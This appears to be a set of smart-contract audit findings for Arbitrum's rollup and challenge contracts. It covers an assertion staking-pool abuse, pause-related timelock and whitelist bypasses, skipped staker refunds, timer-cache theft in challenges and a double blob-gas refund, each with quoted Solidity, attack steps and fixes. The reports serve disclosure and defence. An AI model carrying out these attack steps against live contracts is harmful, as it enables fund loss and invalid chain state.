  • In step 4, the attacker calls the function makeStakeWithdrawableAndWithdrawBackIntoPool to return the staked amount to the AssertionStakingPool contract.
    function makeStakeWithdrawableAndWithdrawBackIntoPool() external {
        makeStakeWithdrawable();
        withdrawStakeBackIntoPool();
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/assertionStakingPool/AssertionStakingPool.sol#L60

This is possible because assertion B now has a child, so withdrawal is allowed: the AssertionStakingPool contract address is considered an inactive staker.

    function returnOldDeposit() external override onlyValidator whenNotPaused {
        requireInactiveStaker(msg.sender);
        withdrawStaker(msg.sender);
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L222

    function requireInactiveStaker(address stakerAddress) internal view {
        require(isStaked(stakerAddress), "NOT_STAKED");
        // A staker is inactive if
        // a) their last staked assertion is the latest confirmed assertion
        // b) their last staked assertion have a child
        bytes32 lastestAssertion = latestStakedAssertion(stakerAddress);
        bool isLatestConfirmed = lastestAssertion == latestConfirmed();
        bool haveChild = getAssertionStorage(lastestAssertion).firstChildBlock > 0;
        require(isLatestConfirmed || haveChild, "STAKE_ACTIVE");
    }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L565
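The inactivity condition can be sketched in Python (a model of requireInactiveStaker's two disjuncts, with illustrative assertion labels, not the Solidity code):

```python
def is_inactive_staker(latest_staked, latest_confirmed, first_child_block):
    # Mirrors requireInactiveStaker: a staker is inactive if their last
    # staked assertion is the latest confirmed one, or already has a child.
    return latest_staked == latest_confirmed or first_child_block > 0

# Before the attacker acts, B has no child: the pool's stake is locked.
print(is_inactive_staker("B", "A", 0))    # False

# Once the attacker creates C as a child of B, the pool counts as
# inactive, so makeStakeWithdrawableAndWithdrawBackIntoPool succeeds.
print(is_inactive_staker("B", "A", 123))  # True
```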

  • In step 5, the attacker, in the same transaction, calls the function createAssertion in the AssertionStakingPool contract to create the invalid assertion D on behalf of the AssertionStakingPool contract. Note that the required stake is available in this contract because, in step 4, the stake related to assertion B was returned.

  • A question may arise: there should be a minimumAssertionPeriod delay between assertion creations, so the attacker should not be able to create assertion D immediately after assertion C. This is not the case, because the attacker crafts assertion D such that overflowAssertion is true.

       if (!overflowAssertion) {
           uint256 timeSincePrev = block.number - getAssertionStorage(prevAssertion).createdAtBlock;
           // Verify that assertion meets the minimum Delta time requirement
           require(timeSincePrev >= minimumAssertionPeriod, "TIME_DELTA");
       }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupUserLogic.sol#L204-L208

In other words, suppose that when assertion B is created, nextInboxPosition is set to 100. When the invalid assertion C is about to be created, for example, 10 more messages have been added to the inbox, so assertion C is created with after-state inboxPosition = 100 and nextInboxPosition = 110. In the same transaction, assertion D is created: this time the attacker sets the after-state inboxPosition to 105 (which is smaller than the target nextInboxPosition = 110). By doing so, overflowAssertion becomes true, which allows creating assertions without any delay.

           if (assertion.afterState.machineStatus != MachineStatus.ERRORED && afterStateCmpMaxInbox < 0) {
               // If we didn't reach the target next inbox position, this is an overflow assertion.
               overflowAssertion = true;
               // This shouldn't be necessary, but might as well constrain the assertion to be non-empty
               require(afterGS.comparePositions(beforeGS) > 0, "OVERFLOW_STANDSTILL");
           }

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/rollup/RollupCore.sol#L429-L434
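The overflow trick and its interaction with the TIME_DELTA check can be modeled in Python (a sketch of the two Solidity checks above, using the example positions 105/110 from the text; not the actual implementation):

```python
def is_overflow_assertion(machine_errored, after_inbox_position, next_inbox_position):
    # Mirrors the overflow check in RollupCore: stopping short of the
    # target inbox position (without an errored machine) flags an
    # overflow assertion.
    return not machine_errored and after_inbox_position < next_inbox_position

def minimum_period_enforced(overflow_assertion):
    # The minimumAssertionPeriod TIME_DELTA check in RollupUserLogic
    # only runs for non-overflow assertions.
    return not overflow_assertion

# Assertion C targeted nextInboxPosition = 110; the attacker stops D at 105.
overflow_d = is_overflow_assertion(False, 105, 110)
print(overflow_d)                           # True: D is an overflow assertion
print(minimum_period_enforced(overflow_d))  # False: no delay required for D
```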

Tools Used

Recommended Mitigation Steps

  • Prevent creating more than one assertion in the AssertionStakingPool contract, e.g. with a one-shot flag:
   bool public alreadyCreated;

   function createAssertion(AssertionInputs calldata assertionInputs) external {
       require(!alreadyCreated, "An assertion has already been created.");
       //......
       alreadyCreated = true;
   }
  • Put access control on the function createAssertion in the AssertionStakingPool contract when the immutable assertionHash is zero. Note that this might introduce centralization.

Assessed type

Context

confirmation timelock grace period is bypassed when the contract is paused and then unpaused

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L125

Vulnerability details

Impact

confirmation timelock is bypassed when the contract is paused and then unpaused

Proof of Concept

After a new assertion is created, there is a timelock period

// Check that deadline has passed
require(block.number >= assertion.createdAtBlock + prevConfig.confirmPeriodBlocks, "BEFORE_DEADLINE");

The prevConfig.confirmPeriodBlocks is the timelock window that acts as a buffer so the assertion cannot be confirmed immediately.

However, when the contract is paused, new blocks still get mined and block.number keeps incrementing.

When the contract is unpaused, the assertion can be confirmed immediately; the timelock period prevConfig.confirmPeriodBlocks is not honored.

The challenge grace period is bypassed as well in the case where the contract is paused, leaving no time to challenge an invalid assertion.

if (prevAssertion.secondChildBlock > 0) {
        // if the prev has more than 1 child, check if this assertion is the challenge winner
        ChallengeEdge memory winningEdge = IEdgeChallengeManager(prevConfig.challengeManager).getEdge(winningEdgeId);
        require(winningEdge.claimId == assertionHash, "NOT_WINNER");
        require(winningEdge.status == EdgeStatus.Confirmed, "EDGE_NOT_CONFIRMED");
        require(winningEdge.confirmedAtBlock != 0, "ZERO_CONFIRMED_AT_BLOCK");
        // an additional number of blocks is added to ensure that the result of the challenge is widely
        // observable before it causes an assertion to be confirmed. After a winning edge is found, it will
        // always be challengeGracePeriodBlocks before an assertion can be confirmed
        require(
            block.number >= winningEdge.confirmedAtBlock + challengeGracePeriodBlocks,
            "CHALLENGE_GRACE_PERIOD_NOT_PASSED"
        );
    }

Tools Used

Manual Review

Recommended Mitigation Steps

Consider extending the confirmation deadline and the challenge grace period for resolving assertions and edges by the pause duration when the contract is unpaused.

Assessed type

Token-Transfer

`removeWhitelistAfterFork` and `removeWhitelistAfterValidatorAfk` can be called when contract is paused, disabling whitelist mechanism

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupAdminLogic.sol#L143-L161
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/RollupUserLogic.sol#L62-L75

Vulnerability details

Description

If the validator whitelist is not meant to be disabled and the rollup contract is paused for long enough, the whitelist can be removed by calling removeWhitelistAfterFork or removeWhitelistAfterValidatorAfk immediately after the admin unpauses the rollup contract.

Impact

If:

  • The rollup contract is paused
  • The validator whitelist mechanism is enabled and is not meant to be disabled
  • The rollup admin has no intention of forcing the inclusion of a new assertion

Then, immediately after the admin calls RollupAdminLogic.unpause(), anyone can call removeWhitelistAfterFork or removeWhitelistAfterValidatorAfk, disabling the whitelist mechanism and enabling anyone to submit new assertions.

Recommended Mitigation Steps

To solve this:

  • Add a check in removeWhitelistAfterFork and removeWhitelistAfterValidatorAfk to ensure that the rollup contract is not paused
  • Add a grace period after unpausing, checked when removeWhitelistAfterFork or removeWhitelistAfterValidatorAfk is called, to give validators time to confirm assertions

In this way:

abstract contract RollupCore is IRollupCore, PausableUpgradeable {
    // after the already declared variables
    //...
    uint256 public unpauseTimestampGracePeriod;
    //...
}

contract RollupAdminLogic is RollupCore, IRollupAdmin, DoubleLogicUUPSUpgradeable {
    //...
-   function resume() external override {
+   function resume(uint256 _unpauseTimestampGracePeriod) external override {
+       require(_unpauseTimestampGracePeriod >= block.timestamp);
+       unpauseTimestampGracePeriod = _unpauseTimestampGracePeriod;
        _unpause();
        emit OwnerFunctionCalled(4);
    }
    //...
}

contract RollupUserLogic is RollupCore, UUPSNotUpgradeable, IRollupUser {
    //...

+   function _requirePauseChecks() internal view {
+       require(!paused(), "CONTRACT_PAUSED");
+       require(block.timestamp > unpauseTimestampGracePeriod, "UNPAUSE_GRACE_PERIOD");
+   }

    function removeWhitelistAfterFork() external {
+       // unpause checks
+       _requirePauseChecks();
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_chainIdChanged(), "CHAIN_ID_NOT_CHANGED");
        validatorWhitelistDisabled = true;
    }

    /**
     * @notice Remove the whitelist after the validator has been inactive for too long
     */
    function removeWhitelistAfterValidatorAfk() external {
+       // unpause checks
+       _requirePauseChecks();
        require(!validatorWhitelistDisabled, "WHITELIST_DISABLED");
        require(_validatorIsAfk(), "VALIDATOR_NOT_AFK");
        validatorWhitelistDisabled = true;
    }
    //...
}
Assessed type

Invalid Validation

Agreements & Disclosures

Agreements

If you are a C4 Certified Contributor by commenting or interacting with this repo prior to public release of the contest report, you agree that you have read the Certified Warden docs and agree to be bound by:

To signal your agreement to these terms, add a 👍 emoji to this issue.

Code4rena staff reserves the right to disqualify anyone from this role and similar future opportunities who is unable to participate within the above guidelines.

Disclosures

Sponsors may elect to add team members and contractors to assist in sponsor review and triage. All sponsor representatives added to the repo should comment on this issue to identify themselves.

To ensure contest integrity, the following potential conflicts of interest should also be disclosed with a comment in this issue:

  1. any sponsor staff or sponsor contractors who are also participating as wardens
  2. any wardens hired to assist with sponsor review (and thus presenting sponsor viewpoint on findings)
  3. any wardens who have a relationship with a judge that would typically fall in the category of potential conflict of interest (family, employer, business partner, etc)
  4. any other case where someone might reasonably infer a possible conflict of interest.

Some Stakers Will Be Missed Out During cleanupOldRollup() call

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/rollup/BOLDUpgradeAction.sol#L347-L349

Vulnerability details

Impact

The stakerCount variable holds the number of stakers in an instance. The NatSpec states that stakerCount is not expected to be > 50, but this is not enforced in the code; there is no restriction at all, so the count can exceed 50.

stakerCount is the number of stakers in an instance and is a function of RollupCore.sol.

What can go wrong here? During the cleanupOldRollup function call, stakerCount is clamped to 50 whenever it is > 50. This is done so the loop is bounded and cannot run out of gas or behave unexpectedly.

The problem is that whenever stakerCount > 50, only the first 50 stakers are iterated. Any stakers beyond index 49 are skipped when a call is made to the cleanupOldRollup() function, potentially leaving them behind without being refunded.

Proof of Concept

/// @dev    Refund the existing stakers, pause and upgrade the current rollup to
    ///         allow them to withdraw after pausing
    function cleanupOldRollup() private {
        IOldRollupAdmin(address(OLD_ROLLUP)).pause();

        uint64 stakerCount = ROLLUP_READER.stakerCount();
        // since we for-loop these stakers we set an arbitrary limit - we dont
        // expect any instances to have close to this number of stakers
        if (stakerCount > 50) {
>            stakerCount = 50;
        }
        for (uint64 i = 0; i < stakerCount; i++) {
            address stakerAddr = ROLLUP_READER.getStakerAddress(i);
            OldStaker memory staker = ROLLUP_READER.getStaker(stakerAddr);
            if (staker.isStaked && staker.currentChallenge == 0) {
                address[] memory stakersToRefund = new address[](1);
                stakersToRefund[0] = stakerAddr;

                IOldRollupAdmin(address(OLD_ROLLUP)).forceRefundStaker(stakersToRefund);
            }
        }

        // upgrade the rollup to one that allows validators to withdraw even whilst paused
        DoubleLogicUUPSUpgradeable(address(OLD_ROLLUP)).upgradeSecondaryTo(IMPL_PATCHED_OLD_ROLLUP_USER);
    }
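The effect of the clamp can be demonstrated with a short Python model of the loop bound (a sketch, not the Solidity code; 53 stakers is an arbitrary example):

```python
def refunded_staker_indices(total_stakers, cap=50):
    # Mirrors the loop bound in cleanupOldRollup: the count is clamped
    # to `cap`, so only indices 0..cap-1 are ever visited.
    return list(range(min(total_stakers, cap)))

visited = refunded_staker_indices(53)
print(len(visited))    # 50
missed = sorted(set(range(53)) - set(visited))
print(missed)          # [50, 51, 52]: these stakers are never refunded
```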

Tools Used

Manual Review

Recommended Mitigation Steps

I recommend enforcing the restriction so that there are never more than 50 stakers in an instance; this ensures that no staker is left behind during the function call.

The createNewStake function should be adjusted to something like:

function createNewStake(address stakerAddress, uint256 depositAmount, address withdrawalAddress) internal {
        uint64 stakerIndex = uint64(_stakerList.length);
@       require(stakerIndex < 50, "TOO_MANY_STAKERS");
        _stakerList.push(stakerAddress);
        _stakerMap[stakerAddress] = Staker(depositAmount, _latestConfirmed, stakerIndex, true, withdrawalAddress);
        emit UserStakeUpdated(stakerAddress, withdrawalAddress, 0, depositAmount);
    }

This adjustment will ensure the stakers to be included in the cleanupOldRollup() function call without leaving any behind.

Assessed type

Loop

Adversary can update his timerCache with his rival's(i.e. honest party's) timer, and maliciously win assertions

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L528
https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/main/src/challengeV2/libraries/EdgeChallengeManagerLib.sol#L698-L700

Vulnerability details

Impact

Adversary will have his edge confirmed, even though he wasn't able to prove his single step edge.

Proof of Concept

updateTimerCacheByClaim only checks that the mutualId of edgeId equals the originId of claimingEdge.
Since the mutualIds of two rivals are equal, an adversary can call updateTimerCacheByClaim, passing the claiming (or one-step-proved) edge of his rival:

updateTimerCacheByClaim function:

function updateTimerCacheByClaim(
    EdgeStore storage store,
    bytes32 edgeId,
    bytes32 claimingEdgeId,
    uint8 numBigStepLevel
) internal returns (bool, uint256) {
    // calculate the time unrivaled without inheritance
    uint256 totalTimeUnrivaled = timeUnrivaled(store, edgeId);
@>  checkClaimIdLink(store, edgeId, claimingEdgeId, numBigStepLevel); //@audit-issue I can update my timerCache with my rival's claim timer
    totalTimeUnrivaled += store.edges[claimingEdgeId].totalTimeUnrivaledCache; 
    return updateTimerCache(store, edgeId, totalTimeUnrivaled);
}

checkClaimIdLink function:

    function checkClaimIdLink(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) private view {
@>      if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(
                store.edges[edgeId].mutualId(),
                store.edges[claimingEdgeId].originId
            );
        }
        // the claiming edge must be exactly one level below
        if (
            nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) !=
            store.edges[claimingEdgeId].level
        ) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

If an adversary cannot prove his edge but an honest party has proven theirs, the adversary can update his timerCache with the honest party's, which allows him to confirm his edge.
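The ambiguity can be shown with a simplified Python model (a sketch in which mutualId is just a tuple over everything except the end state; the field names and values are illustrative, not the actual hashing scheme):

```python
def mutual_id(level, origin_id, start_height, start_root):
    # Simplified: the mutual id covers everything EXCEPT the end state,
    # so two rival edges (same start, different ends) share a mutual id.
    return (level, origin_id, start_height, start_root)

honest = {"level": 1, "origin": "O", "start": (5, "root"), "end": "honest_end"}
evil = {"level": 1, "origin": "O", "start": (5, "root"), "end": "evil_end"}

honest_mid = mutual_id(honest["level"], honest["origin"], *honest["start"])
evil_mid = mutual_id(evil["level"], evil["origin"], *evil["start"])
print(honest_mid == evil_mid)  # True: rivals share a mutual id

# A claiming edge one level down stores originId == its parent's mutualId,
# so the mutualId-vs-originId check cannot tell WHICH rival it belongs to:
# the adversary can pass the honest party's claiming edge for his own edge.
honest_claim = {"origin": honest_mid}
print(evil_mid == honest_claim["origin"])  # True: checkClaimIdLink passes
```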

Tools Used

Manual Review

Recommended Mitigation Steps

Within the ChallengeEdge struct, there should be a parameter that does not change across levels and bisections of an edge.
In the current implementation, claimId is set to 0 when bisecting an edge, which is why it cannot serve as that parameter.
I suggest adding a parameter, say uniqueId, to the ChallengeEdge struct, set to the claimId of the block edge being created.
The difference between ChallengeEdge.claimId and ChallengeEdge.uniqueId is that while the former is set to 0 during edge bisection, the latter never changes.

Now, within the checkClaimIdLink function, also check that the unique IDs match:

    function checkClaimIdLink(
        EdgeStore storage store,
        bytes32 edgeId,
        bytes32 claimingEdgeId,
        uint8 numBigStepLevel
    ) private view {
        if (store.edges[edgeId].mutualId() != store.edges[claimingEdgeId].originId) {
            revert OriginIdMutualIdMismatch(
                store.edges[edgeId].mutualId(),
                store.edges[claimingEdgeId].originId
            );
        }
@>      if (store.edges[edgeId].uniqueId != store.edges[claimingEdgeId].uniqueId) {
            revert("UniqueId must match");
        }
        // the claiming edge must be exactly one level below
        if (
            nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel) !=
            store.edges[claimingEdgeId].level
        ) {
            revert EdgeLevelInvalid(
                edgeId,
                claimingEdgeId,
                nextEdgeLevel(store.edges[edgeId].level, numBigStepLevel),
                store.edges[claimingEdgeId].level
            );
        }
    }

Assessed type

Context

The blob gas is refunded twice in the `addSequencerL2BatchFromBlobs` function

Lines of code

https://github.com/code-423n4/2024-05-arbitrum-foundation/blob/6f861c85b281a29f04daacfe17a2099d7dad5f8f/src/bridge/SequencerInbox.sol#L508

Vulnerability details

The SequencerInbox contract refunds the batch poster for the gas used when calling the function addSequencerL2BatchFromBlobs; see the refundsGas modifier:

 modifier refundsGas(IGasRefunder gasRefunder, IReader4844 reader4844) {
        uint256 startGasLeft = gasleft(); 
        _;
        if (address(gasRefunder) != address(0)) {
            uint256 calldataSize = msg.data.length;
            uint256 calldataWords = (calldataSize + 31) / 32;
            // account for the CALLDATACOPY cost of the proxy contract, including the memory expansion cost
            startGasLeft += calldataWords * 6 + (calldataWords**2) / 512; 
           
            if (msg.sender != tx.origin) { 
                
            } else {
                
                if (address(reader4844) != address(0)) {
                   
                    try reader4844.getDataHashes() returns (bytes32[] memory dataHashes) {  <-----
                        if (dataHashes.length != 0) {
                            uint256 blobBasefee = reader4844.getBlobBaseFee();
                            startGasLeft +=
                                (dataHashes.length * gasPerBlob * blobBasefee) /
                                block.basefee;
                        }
                    } catch {} 
                }
            }

            gasRefunder.onGasSpent(payable(msg.sender), startGasLeft - gasleft(), calldataSize);
        }
    }

If reader4844 is set, the modifier refunds the blob gas too (see the arrow above).

The problem is that the blob gas fee is also refunded via the batch spending report in addSequencerL2BatchFromBlobsImpl, which is called from addSequencerL2BatchFromBlobs:

 function addSequencerL2BatchFromBlobs(
        uint256 sequenceNumber,
        uint256 afterDelayedMessagesRead,
        IGasRefunder gasRefunder,
        uint256 prevMessageCount,
        uint256 newMessageCount
    ) external refundsGas(gasRefunder, reader4844) {
        if (!isBatchPoster[msg.sender]) revert NotBatchPoster();
        if (isDelayProofRequired(afterDelayedMessagesRead)) revert DelayProofRequired();

        addSequencerL2BatchFromBlobsImpl(
            sequenceNumber,
            afterDelayedMessagesRead,
            prevMessageCount,
            newMessageCount
        );  <------
    }

[Link]

Impact

The blob gas is refunded twice in the addSequencerL2BatchFromBlobs flow, making the protocol lose funds.

Proof of Concept

The batch poster is refunded first in the addSequencerL2BatchFromBlobsImpl function (see the arrow below):

 function addSequencerL2BatchFromBlobsImpl(
        uint256 sequenceNumber,
        uint256 afterDelayedMessagesRead,
        uint256 prevMessageCount,
        uint256 newMessageCount
    ) internal {
        (
            bytes32 dataHash,
            IBridge.TimeBounds memory timeBounds,
            uint256 blobGas
        ) = formBlobDataHash(afterDelayedMessagesRead);

      
        (
            uint256 seqMessageIndex,
            bytes32 beforeAcc,
            bytes32 delayedAcc,
            bytes32 afterAcc
        ) = addSequencerL2BatchImpl(
                dataHash,
                afterDelayedMessagesRead,
                0,
                prevMessageCount,
                newMessageCount
            );

 
        if (seqMessageIndex != sequenceNumber && sequenceNumber != ~uint256(0)) {
            revert BadSequencerNumber(seqMessageIndex, sequenceNumber);
        }

        emit SequencerBatchDelivered(
            sequenceNumber,
            beforeAcc,
            afterAcc,
            delayedAcc,
            totalDelayedMessagesRead,
            timeBounds,
            IBridge.BatchDataLocation.Blob
        );

        
        if (hostChainIsArbitrum) revert DataBlobsNotSupported();

      
        if (msg.sender == tx.origin && !isUsingFeeToken) {
            submitBatchSpendingReport(dataHash, seqMessageIndex, block.basefee, blobGas); <-----
        }
    }

[Link]

And a second time in the refundsGas modifier (see the arrow below):

 modifier refundsGas(IGasRefunder gasRefunder, IReader4844 reader4844) {
        uint256 startGasLeft = gasleft(); 
        _;
        if (address(gasRefunder) != address(0)) {
            uint256 calldataSize = msg.data.length;
            uint256 calldataWords = (calldataSize + 31) / 32;
            // account for the CALLDATACOPY cost of the proxy contract, including the memory expansion cost
            startGasLeft += calldataWords * 6 + (calldataWords**2) / 512; 
            // if triggered in a contract call, the spender may be overrefunded by appending dummy data to the call
            // so we check if it is a top level call, which would mean the sender paid calldata as part of tx.input
            // solhint-disable-next-line avoid-tx-origin
            if (msg.sender != tx.origin) { 
                // We can't be sure if this calldata came from the top level tx,
                // so to be safe we tell the gas refunder there was no calldata.
                calldataSize = 0;
            } else {
                // for similar reasons to above we only refund blob gas when the tx.origin is the msg.sender
                // this avoids the caller being able to send blobs to other contracts and still get refunded here
                if (address(reader4844) != address(0)) {
                    // add any cost for 4844 data, the data hash reader throws an error prior to 4844 being activated
                    // we do this addition here rather in the GasRefunder so that we can check the msg.sender is the tx.origin
                    try reader4844.getDataHashes() returns (bytes32[] memory dataHashes) {  <-----
                        if (dataHashes.length != 0) {
                            uint256 blobBasefee = reader4844.getBlobBaseFee();
                            startGasLeft +=
                                (dataHashes.length * gasPerBlob * blobBasefee) /
                                block.basefee;
                        }
                    } catch {} 
                }
            }

            gasRefunder.onGasSpent(payable(msg.sender), startGasLeft - gasleft(), calldataSize);
        }
    }
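The double credit can be illustrated with the blob-cost arithmetic from the modifier (a sketch that treats both credits as equal in execution-gas units, which is a simplification; the blob count and fee values are made up):

```python
GAS_PER_BLOB = 2**17  # 131072 gas per blob, per EIP-4844

def blob_cost_in_execution_gas(num_blobs, blob_basefee, basefee):
    # Blob cost converted to execution-gas units, as in refundsGas:
    # dataHashes.length * gasPerBlob * blobBasefee / block.basefee
    return num_blobs * GAS_PER_BLOB * blob_basefee // basefee

once = blob_cost_in_execution_gas(6, 30, 20)
print(once)      # 1179648: gas-equivalent units for one batch's blobs

# The same cost is credited once via submitBatchSpendingReport in
# addSequencerL2BatchFromBlobsImpl and again via the refundsGas modifier.
print(2 * once)  # 2359296: the batch poster is compensated twice
```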

Tools Used

Manual.

Recommended Mitigation Steps

Consider not refunding the blob gas to the batch poster in the addSequencerL2BatchFromBlobsImpl function, since the blob gas is already refunded in the refundsGas modifier.

Assessed type

Other
